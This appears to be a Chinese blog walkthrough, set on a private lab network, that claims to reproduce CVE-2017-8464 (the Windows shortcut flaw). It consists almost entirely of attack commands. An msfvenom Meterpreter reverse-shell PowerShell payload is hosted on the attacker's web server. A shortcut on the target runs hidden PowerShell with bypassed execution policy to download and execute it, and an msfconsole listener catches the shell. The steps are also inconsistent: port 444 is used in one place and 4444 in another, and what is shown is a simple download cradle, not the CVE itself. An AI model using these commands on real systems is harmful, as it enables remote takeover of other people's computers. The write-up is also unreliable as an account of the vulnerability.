我们的攻击机IP是192.168.222.133
目标机IP是192.168.222.132
我们首先生成一个powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1
![图片[1]-CVE-2017-8464复现(远程快捷方式漏洞)-](https://fbi.kim/wp-content/uploads/2019/12/image-100.png)
把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html
![图片[2]-CVE-2017-8464复现(远程快捷方式漏洞)-](https://fbi.kim/wp-content/uploads/2019/12/image-101.png)
service apache2 start 然后我们访问127.0.0.1/1.ps1 是可以访问的
![图片[3]-CVE-2017-8464复现(远程快捷方式漏洞)-](https://fbi.kim/wp-content/uploads/2019/12/image-102.png)
我们在目标机创建快捷方式powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.222.133/1.ps1’);test.ps1”
然后访问
![图片[4]-CVE-2017-8464复现(远程快捷方式漏洞)-](https://fbi.kim/wp-content/uploads/2019/12/image-103.png)
创建监听,然后连接meterpreter
msfconsole
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.133
set LPORT 4444
exploit
![图片[5]-CVE-2017-8464复现(远程快捷方式漏洞)-](https://fbi.kim/wp-content/uploads/2019/12/image-104.png)
复现成功
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END